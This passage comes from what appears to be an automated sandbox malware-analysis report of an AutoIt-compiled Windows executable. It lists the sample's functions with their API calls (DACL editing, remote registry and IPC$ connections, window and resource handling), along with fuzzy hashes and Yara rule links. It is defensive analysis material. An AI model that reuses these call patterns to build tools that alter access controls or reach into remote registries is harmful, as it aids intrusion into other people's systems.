                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 34673085-438819550
                                                                                                                  • Opcode ID: fccc05fe530891622bc4675ee102b01f4d66e9de4532baa21167b9644f309170
                                                                                                                  • Instruction ID: f0402759e5619856fdcf40417aa9afc208978feb5298076f20a6393e1c174812
                                                                                                                  • Opcode Fuzzy Hash: fccc05fe530891622bc4675ee102b01f4d66e9de4532baa21167b9644f309170
                                                                                                                  • Instruction Fuzzy Hash: 278181715043459FCB24EF24C8699AEBBE8FFC8304F14982EF885E7251E630D954CB92
                                                                                                                  Function 00E1A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E1ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00E1ABD7
                                                                                                                    • Part of subcall function 00E1ABBB: GetLastError.KERNEL32(?,00E1A69F,?,?,?), ref: 00E1ABE1
                                                                                                                    • Part of subcall function 00E1ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00E1A69F,?,?,?), ref: 00E1ABF0
                                                                                                                    • Part of subcall function 00E1ABBB: RtlAllocateHeap.NTDLL(00000000,?,00E1A69F), ref: 00E1ABF7
                                                                                                                    • Part of subcall function 00E1ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00E1AC0E
                                                                                                                    • Part of subcall function 00E1AC56: GetProcessHeap.KERNEL32(00000008,00E1A6B5,00000000,00000000,?,00E1A6B5,?), ref: 00E1AC62
                                                                                                                    • Part of subcall function 00E1AC56: RtlAllocateHeap.NTDLL(00000000,?,00E1A6B5), ref: 00E1AC69
                                                                                                                    • Part of subcall function 00E1AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E1A6B5,?), ref: 00E1AC7A
                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E1A8CB
                                                                                                                  • _memset.LIBCMT ref: 00E1A8E0
                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E1A8FF
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00E1A910
                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00E1A94D
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E1A969
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00E1A986
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E1A995
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E1A99C
                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E1A9BD
                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00E1A9C4
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E1A9F5
                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E1AA1B
                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E1AA2F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2347767575-0
                                                                                                                  • Opcode ID: a337608bd5c6524ee30d1116a3b3ea95d179afe495065bda04e5bb29b2c96cd3
                                                                                                                  • Instruction ID: ed600657ab467ee101d0c40a11c43b05af2bb7a66014ed720ba81d6f2349dd62
                                                                                                                  • Opcode Fuzzy Hash: a337608bd5c6524ee30d1116a3b3ea95d179afe495065bda04e5bb29b2c96cd3
                                                                                                                  • Instruction Fuzzy Hash: 2D515B71A01209AFDF10DF91ED44EFEBBBAFF04304F089129E811B6291DB749A45CB61
                                                                                                                  Function 00E2CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LoadString__swprintf_wprintf
                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                  • API String ID: 2889450990-2391861430
                                                                                                                  • Opcode ID: 3c0a0cf8ce7cd714222bd09ff865b5806cfa6304cbc26c711511ac92c080c441
                                                                                                                  • Instruction ID: 9e037a1400fe885a2e00b80aed5c7352340c651908aec8905bd6149e832c54e8
                                                                                                                  • Opcode Fuzzy Hash: 3c0a0cf8ce7cd714222bd09ff865b5806cfa6304cbc26c711511ac92c080c441
                                                                                                                  • Instruction Fuzzy Hash: 27516A31800259BACF15FBA1DD82EEEB7B8EF09344F2011A5F505720A2EB716E59DB71
                                                                                                                  Function 00E2CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LoadString__swprintf_wprintf
                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                  • API String ID: 2889450990-3420473620
                                                                                                                  • Opcode ID: ef39a869b6799b957b9e1866f6bb03162b9eb7dd333e50bae213e1228a746653
                                                                                                                  • Instruction ID: 4d89cf52ff77e678865464b87fc604af34d7e257bbdaa3a1e742695f970ab45c
                                                                                                                  • Opcode Fuzzy Hash: ef39a869b6799b957b9e1866f6bb03162b9eb7dd333e50bae213e1228a746653
                                                                                                                  • Instruction Fuzzy Hash: 97516B31900259AACF15FBA1ED42EEEB7B8EF08344F2051A5F505720A2EB706F59DB71
                                                                                                                  Function 00E255BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E255D7
                                                                                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00E25664
                                                                                                                  • GetMenuItemCount.USER32(00EA1708), ref: 00E256ED
                                                                                                                  • DeleteMenu.USER32(00EA1708,00000005,00000000,000000F5,?,?), ref: 00E2577D
                                                                                                                  • DeleteMenu.USER32(00EA1708,00000004,00000000), ref: 00E25785
                                                                                                                  • DeleteMenu.USER32(00EA1708,00000006,00000000), ref: 00E2578D
                                                                                                                  • DeleteMenu.USER32(00EA1708,00000003,00000000), ref: 00E25795
                                                                                                                  • GetMenuItemCount.USER32(00EA1708), ref: 00E2579D
                                                                                                                  • SetMenuItemInfoW.USER32(00EA1708,00000004,00000000,00000030), ref: 00E257D3
                                                                                                                  • GetCursorPos.USER32(?), ref: 00E257DD
                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00E257E6
                                                                                                                  • TrackPopupMenuEx.USER32(00EA1708,00000000,?,00000000,00000000,00000000), ref: 00E257F9
                                                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E25805
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3993528054-0
                                                                                                                  • Opcode ID: 1fe9d0d59ca8d6c0a2c71461a7ec33cb317471f911cb98fd3ceab2bfb8b76448
                                                                                                                  • Instruction ID: 1c38d6aeb6eac46809a1c04207203a951c7e2aec3d6fde44aaead63f1307e1b9
                                                                                                                  • Opcode Fuzzy Hash: 1fe9d0d59ca8d6c0a2c71461a7ec33cb317471f911cb98fd3ceab2bfb8b76448
                                                                                                                  • Instruction Fuzzy Hash: 27712572640625BFEB209B55ED49FAABFA5FF00368F644216F5197A1D0C7B0AC14CB90
                                                                                                                  Function 00E1A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E1A1DC
                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E1A211
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E1A22D
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E1A249
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E1A273
                                                                                                                  • CLSIDFromString.COMBASE(?,?), ref: 00E1A29B
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E1A2A6
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E1A2AB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                  • API String ID: 1687751970-22481851
                                                                                                                  • Opcode ID: 106016acd75df79cfe1d769966785146f6d68ce63430209625ab75b7493ce7c0
                                                                                                                  • Instruction ID: 58937d0453c88c4fd5eb381020781c061b16dbe6e4b4a1d62c9b7ab76720afbf
                                                                                                                  • Opcode Fuzzy Hash: 106016acd75df79cfe1d769966785146f6d68ce63430209625ab75b7493ce7c0
                                                                                                                  • Instruction Fuzzy Hash: 0E410876D11229AFCF25EBA5EC85DEEB778FF14344F444069E901B3160DA709E45CBA0
                                                                                                                  Function 00E267E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __swprintf.LIBCMT ref: 00E267FD
                                                                                                                  • __swprintf.LIBCMT ref: 00E2680A
                                                                                                                    • Part of subcall function 00E0172B: __woutput_l.LIBCMT ref: 00E01784
                                                                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 00E26834
                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00E26840
                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00E2684D
                                                                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 00E2686D
                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00E2687F
                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00E2688E
                                                                                                                  • LockResource.KERNEL32(?), ref: 00E2689A
                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00E268F9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                  • String ID: 5
                                                                                                                  • API String ID: 1433390588-3632891597
                                                                                                                  • Opcode ID: c45d229faca0e8d331ea20cdeb36c6f36535be296a420b50c4d083c14ea9a13c
                                                                                                                  • Instruction ID: ea0e9118d071885df6a58ec61f8a7c5cc77c33699fc399e1cbd408338ee0d809
                                                                                                                  • Opcode Fuzzy Hash: c45d229faca0e8d331ea20cdeb36c6f36535be296a420b50c4d083c14ea9a13c
                                                                                                                  • Instruction Fuzzy Hash: 48319071A0026AAFDB189F61FD59ABF7BA8FF08384F008525F902F2150E770D955DB60
                                                                                                                  Function 00E225B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E536F4,00000010,?,Bad directive syntax error,00E7DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00E225D6
                                                                                                                  • LoadStringW.USER32(00000000,?,00E536F4,00000010), ref: 00E225DD
                                                                                                                  • _wprintf.LIBCMT ref: 00E22610
                                                                                                                  • __swprintf.LIBCMT ref: 00E22632
                                                                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E226A1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                  • API String ID: 1080873982-4153970271
                                                                                                                  • Opcode ID: d68b5416e4a309393212d0bfc2bdc11491b7e4e94835c24696c4f697c5fa6ac2
                                                                                                                  • Instruction ID: 383a4403d2b09e577ab01c3a448c204238e0500785ee809f8ef567783cd0bfa8
                                                                                                                  • Opcode Fuzzy Hash: d68b5416e4a309393212d0bfc2bdc11491b7e4e94835c24696c4f697c5fa6ac2
                                                                                                                  • Instruction Fuzzy Hash: BD219132800359BFCF11BB90DC06EEE7778FF18344F045455F505760A2DA70A659DB60
                                                                                                                  Function 00E27AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E27B42
                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E27B58
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E27B69
                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E27B7B
                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E27B8C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: SendString
                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                  • API String ID: 890592661-1007645807
                                                                                                                  • Opcode ID: 723f73b2b5137abca4052fde9b271ab2680018ed5ad6817ba0447b1ed7ff6cc9
                                                                                                                  • Instruction ID: c264d5f9346c7faf651b6568a2ae9f3c3385a6925629c7be0f237b075aded614
                                                                                                                  • Opcode Fuzzy Hash: 723f73b2b5137abca4052fde9b271ab2680018ed5ad6817ba0447b1ed7ff6cc9
                                                                                                                  • Instruction Fuzzy Hash: 5C11C4A0A503A979DB20B3B2DC4ADFF7B7CEB91B04F00141A7411B20C1DEB01E49C6B0
                                                                                                                  Function 00E2778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • timeGetTime.WINMM ref: 00E27794
                                                                                                                    • Part of subcall function 00DFDC38: timeGetTime.WINMM(?,75A8B400,00E558AB), ref: 00DFDC3C
                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00E277C0
                                                                                                                  • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00E277E4
                                                                                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00E27806
                                                                                                                  • SetActiveWindow.USER32 ref: 00E27825
                                                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E27833
                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E27852
                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 00E2785D
                                                                                                                  • IsWindow.USER32 ref: 00E27869
                                                                                                                  • EndDialog.USER32(00000000), ref: 00E2787A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                  • String ID: BUTTON
                                                                                                                  • API String ID: 1194449130-3405671355
                                                                                                                  • Opcode ID: 8204b8feff09e851075fa3f99571661061b9117a155ee881ada402e4e21c05f3
                                                                                                                  • Instruction ID: 121faa73afd6cc20655b121bcab596cfc051f8f12aeb9c98bebff0aab9e53ccd
                                                                                                                  • Opcode Fuzzy Hash: 8204b8feff09e851075fa3f99571661061b9117a155ee881ada402e4e21c05f3
                                                                                                                  • Instruction Fuzzy Hash: 5E21507070C219AFE7085B32FC89B267F69FB0A399B412125F557B2172CBB16C1CCA21
                                                                                                                  Function 00E302EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
                                                                                                                    • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00E3034B
                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E303DE
                                                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00E303F2
                                                                                                                  • CoCreateInstance.COMBASE(00E6DA8C,00000000,00000001,00E93CF8,?), ref: 00E3043E
                                                                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E304AD
                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 00E30505
                                                                                                                  • _memset.LIBCMT ref: 00E30542
                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00E3057E
                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E305A1
                                                                                                                  • CoTaskMemFree.COMBASE(00000000), ref: 00E305A8
                                                                                                                  • CoTaskMemFree.COMBASE(00000000), ref: 00E305DF
                                                                                                                  • CoUninitialize.COMBASE ref: 00E305E1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
